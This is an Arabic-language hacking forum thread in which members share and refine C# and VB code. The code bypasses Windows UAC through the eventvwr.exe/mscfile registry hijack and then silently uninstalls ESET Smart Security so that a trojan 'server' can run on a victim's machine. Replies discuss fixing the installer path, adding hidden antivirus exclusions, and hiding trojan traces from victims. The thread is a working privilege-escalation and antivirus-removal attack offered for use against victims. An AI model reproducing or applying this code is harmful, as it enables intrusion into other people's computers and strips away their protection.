Hallaj Silent Uninstalling Eset Smart Security 10

تم تحميل الصفحة في 1,1461264 ثانية
Hallaj Silent Uninstalling Eset Smart Security 10
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

..

طبعا بعد ان قام الاخ المبدع Dr-Brok بـ طرح طريقة تخطي UAC
اصبح كل شيئ سهل عملة وطال ذلك الحمايات ايضا فـ كما نعلم
جميعا ان اول من تطرق لـ طريقة ازالة تنصيب النود بشكل صامت هو الاخ ! A Z E R T Y 9 !
ولكن كان ينقص طريقة فقط تخطي UAC وتصبح كامله لذلك قمت بـ دمج الفكرتين معا في اكواد C#
ونتج عن ذلك ازالة صامته كليا للنود بدون ظهور اي شيئ لليوزر ويتم حذف النود كاملا ويمكنك بعد ذلك تشغيل السيرفر خام


youtube

Htest Code :
كود C#
static void HExecuted(){
  string shel = "%SystemRoot%\\system32\\mmc.exe";
  object hrt = (shel + (" " + "\"%1\" %*"));
  string SSS = System.IO.Path.GetTempPath();
  System.IO.File.WriteAllBytes((SSS + "\\aliUN.exe"), Properties.Resources.aliUN);
  Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\\Classes\\mscfile\\shell\\open\\command").SetValue("", (SSS + "aliUN.exe"));
  System.Diagnostics.Process.Start("eventvwr.exe");
  System.Threading.Thread.Sleep(10000);
  Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\\Classes\\mscfile\\shell\\open\\command").SetValue("", hrt);
  }


aliUN Code :
كود C#
String HPath = "\"C:\\ProgramData\\ESET\\ESET Smart Security\\Installer\\ess_nt64_enu.msi\" ";
  Microsoft.VisualBasic.Interaction.Shell(
  "msiexec /x " + HPath + " /qn /norestart", Microsoft.VisualBasic.AppWinStyle.NormalFocus, true);

الطريقة تعمل على جميع انظمة ويندوز بالنواتين
ملاحظة : انا كتبت الاكواد بشكل سريع انت يمكنك تطويرها للافضل
كما يمكن تقليص الكود اذا كنت تهتم بالحجم الى اقل من هذا فقط فكر



الاهداء :

ᵀᴿᴼᴶᴬᴺ ᴴᴼᴿˁᴱ
๖ۣۜA M E E R
v_B01
Tsunamii
N A P O L E O N
Mr-3amo
dead sand
Dr-Brok
KingTargets
R̳̿ A̳̿ J̳̿ A̳̿ W̳̿ ̿I̳
KingTargets
! A Z E R T Y 9 !

والى جميع اعضاء وزوار الديف بوينت
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
يا اخي و الله انك بطل
و سابقنا دائماً الى الاشياء المفصلية
تم حفظها في المفضلة اخي Hallaj ابدعت​
تسلم صديقي امير بعض من ما عندكم
انا بصراحة مو عاجبتني فكرة ازالة الحماية هههه
افضل تحديها وتخطيها وهي تعمل وليس ازالتها من الجهاز
ولكن هذا مايريده الاعضاء رأيت الكثير من مواضيع الطلبات بخصوص هذا الامر
وان شاء الله الحماية التاليه الي جالس اجرب عليها حاليا هي الافيرا فـ راح يكون هناك
امرين اما ازالتها بشكل صامت كـ هذه الطريقة أو سأقوم بعمل exclusion لسيرفر في الحماية
 

azerty94

Active DeveloPer
rankrank
إنضم
9 مارس 2011
المشاركات
337
الإعجابات
347
النقاط
63
السلام عليكم
اولا شكرا اخي هلاج على الاهداء
صراحه لم اشاهد الفديو لارى ترتيب الاكواد
لكن لاحضت ان هناك خطء بسيط يمكن سقط من سهوا هه
وهو ان اسم : \ess_nt64_enu.msi " من الاسم يبدو انك 64بيت "
الملف المستهدف متغير من جهاز لاخر وليس تابت
وهدا الامر قمت بالتطرق له في الموضوع
 

Dr-Brok

Beginner Developer
rankrank
إنضم
19 مايو 2016
المشاركات
160
الإعجابات
222
النقاط
43
العمر
29
السلام عليكم
امس كنت رح احط له الكود هذا بالذات في الموضوع
but it's not worth it ...
يمكن قتل الحمايات بدون حذفها لاكن مثل ما قلت هالشيء غير عملي ابدا
موفق ان شاء الله
 

Dr-Brok

Beginner Developer
rankrank
إنضم
19 مايو 2016
المشاركات
160
الإعجابات
222
النقاط
43
العمر
29
السلام عليكم
اولا شكرا اخي هلاج على الاهداء
صراحه لم اشاهد الفديو لارى ترتيب الاكواد
لكن لاحضت ان هناك خطء بسيط يمكن سقط من سهوا هه
وهو ان اسم : \ess_nt64_enu.msi " من الاسم يبدو انك 64بيت "
الملف المستهدف متغير من جهاز لاخر وليس تابت
وهدا الامر قمت بالتطرق له في الموضوع
الحل بسيط
كود Visual Basic
 Dim Pdir = "C:\ProgramData\ESET"
        Dim xSpdir As String = 0
        Dim mPath As String = 0
        Dim Dir As New DirectoryInfo(Pdir)
        For Each Spdir In Dir.GetDirectories
            If Spdir.Name.Contains("ESET") Then
                xSpdir = Spdir.FullName
            End If
        Next
        Dim Pdir2 As String = xSpdir & "\Installer"
        Dim Dir0 As New DirectoryInfo(Pdir2)
        Dim fPath() As FileInfo = Dir0.GetFiles()
        For Each File In fPath
            If File.Name.EndsWith(".msi") Then
                mPath = File.FullName
            End If
        Next

        Shell("msiexec /x " & mPath & " /qn /norestart", AppWinStyle.Hide)
 
إنضم
5 أبريل 2013
المشاركات
598
الإعجابات
1,323
النقاط
93
و عليكم السلام و رحمة الله و بركاته

أولاً شكراً على الإهداء .. طرحت الحل على السريع فأبدعت
بصراحة أستغرب من كثرة طلبات حذف الحماية و اللي ألاحظه أي شخص مثبت حماية أول ما يشغل كمبيوتره يشيك على الحماية
و مع كل ريستارت يشيك على الأيقونة .. فما أدري ما الفائدة المجنية من هالأمر

و لكن مثل ما تفضلت إضافة إستثناء برمجياً و لبقاء إلى الأمد .. [ إستثناء + إخفاء من قائمة إستثناءات ]
^ فهذا الحل المنطقي المتكامل اللي أراه .. طبعاً بعد ما تخفي آثار التروجان بحيث حتى اللي يشيّك ببرامج مثل بروسيس هاكر ما ينتبه

فالنهاية .. كان الله في عونهم .. حتى لما يخترقوا و يحذفوا حماية و يتفاجئوا الضحية طارت بيقولون إنتهى الإختراق و الحقيقة هم أنتهوا

أشكرك على الطرح و أشكر أزيرتي و دكتور بروك على إطروحاتهم الجميلة و أشكر كل شخص يفكر و يحاول

v_B01
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
يعطيك الف عافيه اشتقت حق مواضيعك لازم ما تغيب علينا
الله يعافيك صديقي توسنامي تشتاق لك الجنة ان شاء الله
قريب راح انتهي من الجامعة وان شاء الله نرجع لـ الايام الجميلة بالديف
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
السلام عليكم
اولا شكرا اخي هلاج على الاهداء
صراحه لم اشاهد الفديو لارى ترتيب الاكواد
لكن لاحضت ان هناك خطء بسيط يمكن سقط من سهوا هه
وهو ان اسم : \ess_nt64_enu.msi " من الاسم يبدو انك 64بيت "
الملف المستهدف متغير من جهاز لاخر وليس تابت
وهدا الامر قمت بالتطرق له في الموضوع
وعليكم السلام
العفو اخي ازيرتي منور
نعم صديقي انا متعمد لم اضع الكود كامل ومضبط
عشان الاعضاء تعتمد على نفسها وايضا في اشياء بسيطة
ممكن تنحذف من الكود ويصبح اخف ويمكن اضافة اشياء اخرى اتركها للمطورين
وكما تفضلت انت نعم في موضوعك الي طرحت فيه الثغره حل الخطأ موجود في الكود
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
السلام عليكم
امس كنت رح احط له الكود هذا بالذات في الموضوع
but it's not worth it ...
يمكن قتل الحمايات بدون حذفها لاكن مثل ما قلت هالشيء غير عملي ابدا
موفق ان شاء الله
وعليكم السلام
بصراحة من يوم طرحت انت طريقة تخطي الصلاحيات
واشياء كثيره استطعت عملها ليس فقط بالحمايات ولكن اشياء اكبر منها
لذلك اجدد لك شكري اخي على عدم بخلك بـ الطريقة ووضعها لـ الاعضاء تحياتي لك
 
إنضم
8 سبتمبر 2013
المشاركات
7,676
الإعجابات
11,493
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
تسلم صديقي امير بعض من ما عندكم
انا بصراحة مو عاجبتني فكرة ازالة الحماية هههه
افضل تحديها وتخطيها وهي تعمل وليس ازالتها من الجهاز
ولكن هذا مايريده الاعضاء رأيت الكثير من مواضيع الطلبات بخصوص هذا الامر
وان شاء الله الحماية التاليه الي جالس اجرب عليها حاليا هي الافيرا فـ راح يكون هناك

امرين اما ازالتها بشكل صامت كـ هذه الطريقة أو سأقوم بعمل exclusion لسيرفر في الحماية
شيء يستحق الانتظار و بقوة
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
و عليكم السلام و رحمة الله و بركاته

أولاً شكراً على الإهداء .. طرحت الحل على السريع فأبدعت
بصراحة أستغرب من كثرة طلبات حذف الحماية و اللي ألاحظه أي شخص مثبت حماية أول ما يشغل كمبيوتره يشيك على الحماية
و مع كل ريستارت يشيك على الأيقونة .. فما أدري ما الفائدة المجنية من هالأمر

و لكن مثل ما تفضلت إضافة إستثناء برمجياً و لبقاء إلى الأمد .. [ إستثناء + إخفاء من قائمة إستثناءات ]
^ فهذا الحل المنطقي المتكامل اللي أراه .. طبعاً بعد ما تخفي آثار التروجان بحيث حتى اللي يشيّك ببرامج مثل بروسيس هاكر ما ينتبه

فالنهاية .. كان الله في عونهم .. حتى لما يخترقوا و يحذفوا حماية و يتفاجئوا الضحية طارت بيقولون إنتهى الإختراق و الحقيقة هم أنتهوا

أشكرك على الطرح و أشكر أزيرتي و دكتور بروك على إطروحاتهم الجميلة و أشكر كل شخص يفكر و يحاول

v_B01
العفو صديقي سليمان الابداع منك وفيك
اوفقك الرأي فـ حذف الحماية هو مجرد تهرب منها وايضا
اثارة شك الضحية المستهدفه فـ من الممكن ان يحمل حماية اقوى منها
لان الاغلب من يشوف جهازة بدون حماية ماراح يقف مكتوف الايدي راح يحمل اخرى
الاستثناء نعم هو الحل المنطقي لـ من يريد اختراق نظيف وبدون شك وفي الكاسبر جربت هذا الاستثناء
لكن ظهرت لي مشكلة ان يحتاج الى باسورد لكي ينفذ الامر وحاليا جالس اجرب على الافيرا وان شاء الله خيرا
 
إنضم
16 مايو 2012
المشاركات
2,467
الإعجابات
3,862
النقاط
113
الإقامة
.:: EgYpT ::.
بنورك اخي فارس نعم لك الحرية صديقي
تسلم ياطيب هذا من طيب اصلك

اولا اهنيك على كونك اول شخص يضع الطريقه باستخدام هذا الكود الخاص بتخطى UAC
واكثر مايعجبنى فيك وفى بعض الشخصيات مثلك انك لاتدخل فى نقاشات ولا تتكلم كثيرا
بل تقدم افعال فورا ثم بعد ذلك تتناقش وتتكلم
وهناك شخصيه ايضا مثلك انا متاكد من انها تستطيع فعل كل مانفعله نحن فى غمضة عين
ومتاكد جدا جدا من احترافيته وتمكنه سواء فى تخطى الحمايات او حتى حذفها
الاخ الحبيب حازم .. مايعجبنى فيه ايضا انه قليل الكلام مثلك ومواضيعه ايضا مثلك دوما تكون قنبله .ز فعلا انتم وبعض الشخصيات الاخرى هنا من اكثر الاعضاء الذين اعجبت بشخصيتهم منذ دخولى هذا العالم

وايضا كل الشكر والاحترام للاخ الكريم دكتور بروك على نقله الكود وله كل احترام انه لم ينسب الكود لنفسه
وايضا يحترم جدا الاخ ازيرتى على وضعه اول خطوه لحذف النود بتلك الطريقه الخاصه بكم

لكن هناك مشكله فى هذا الكود
اولها فى حالة الكاسب رالعاديه واذا كان الكاسبر مفعل وغير معطل فلن يعمل الكود
سواء استخدمت الكود على الكاسبر او استخدمته على حمايه اخرى فى وجود الكاسبر
او حتى استخدمت الكود فى عمل اى شىء فى وجود الكاسبر

لهذا انا لا احبذ استخدام هذا الكود الا فى بعض الاحيان خصوصا ان الكاسبر حمايه مهمه ومستخدمه بكثره طبعا

ثانيا يلزم ( على حسب خبرتى البسيطه ) حذف المفتاح الى تم كتابته فى الريجسترى لانه قد يعطل بعض مهام الويندوز اذا تم تركه
على سبيل المثال خاصيه
Manage ل My Computer

تلك بعض الملاحظات البسيطه
واعتذر لو ازعجتك ياغالى وشكرا لزوقك
 
إنضم
16 مايو 2012
المشاركات
2,467
الإعجابات
3,862
النقاط
113
الإقامة
.:: EgYpT ::.
وايضا هناك مشكله اخرى من الممكن ان تواجه بعض الاشخاص عند استخدامهم الكود

ماذا لو كان مسار تثبيت الحمايه عند الضحيه ؟؟

D:\Eset
وليس
C:\Eset

ساعتها الكود لن ينفع الا على جهازك الشخصى او لازم تثبت له النود على السى على وجه الخصوص
 
إنضم
18 يوليو 2015
المشاركات
4,848
الإعجابات
8,688
النقاط
133
الإقامة
Republic Of Bahrain
تسلم ياطيب هذا من طيب اصلك

اولا اهنيك على كونك اول شخص يضع الطريقه باستخدام هذا الكود الخاص بتخطى UAC
واكثر مايعجبنى فيك وفى بعض الشخصيات مثلك انك لاتدخل فى نقاشات ولا تتكلم كثيرا
بل تقدم افعال فورا ثم بعد ذلك تتناقش وتتكلم
وهناك شخصيه ايضا مثلك انا متاكد من انها تستطيع فعل كل مانفعله نحن فى غمضة عين
ومتاكد جدا جدا من احترافيته وتمكنه سواء فى تخطى الحمايات او حتى حذفها
الاخ الحبيب حازم .. مايعجبنى فيه ايضا انه قليل الكلام مثلك ومواضيعه ايضا مثلك دوما تكون قنبله .ز فعلا انتم وبعض الشخصيات الاخرى هنا من اكثر الاعضاء الذين اعجبت بشخصيتهم منذ دخولى هذا العالم

وايضا كل الشكر والاحترام للاخ الكريم دكتور بروك على نقله الكود وله كل احترام انه لم ينسب الكود لنفسه
وايضا يحترم جدا الاخ ازيرتى على وضعه اول خطوه لحذف النود بتلك الطريقه الخاصه بكم

لكن هناك مشكله فى هذا الكود
اولها فى حالة الكاسب رالعاديه واذا كان الكاسبر مفعل وغير معطل فلن يعمل الكود
سواء استخدمت الكود على الكاسبر او استخدمته على حمايه اخرى فى وجود الكاسبر
او حتى استخدمت الكود فى عمل اى شىء فى وجود الكاسبر

لهذا انا لا احبذ استخدام هذا الكود الا فى بعض الاحيان خصوصا ان الكاسبر حمايه مهمه ومستخدمه بكثره طبعا

ثانيا يلزم ( على حسب خبرتى البسيطه ) حذف المفتاح الى تم كتابته فى الريجسترى لانه قد يعطل بعض مهام الويندوز اذا تم تركه
على سبيل المثال خاصيه
Manage ل My Computer

تلك بعض الملاحظات البسيطه
واعتذر لو ازعجتك ياغالى وشكرا لزوقك
شكرا لك صديقي فارس على النقد البناء
بصراحة لم اجرب على الكاسبر فقط النود حاليا
نعم بخصوص الحذف امره سهل وكما قلت انا لم اضع الكود كاملا
كتبته على السريع لدمج الفكرتين معا ولهذا اترك الباقي لـ من يريد الطريقة
ان يقوم بتطويرها واضافة الاشياء الناقصه كما تفضلت حذف المفتاح بعد الانتهاء من عمله
وكما تفضل الاخ ازيرتي عمل حلقة لجلب اسم الملف لان متغير غير ثابت وايضا بالامكان عمل تحسينات اخرى
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل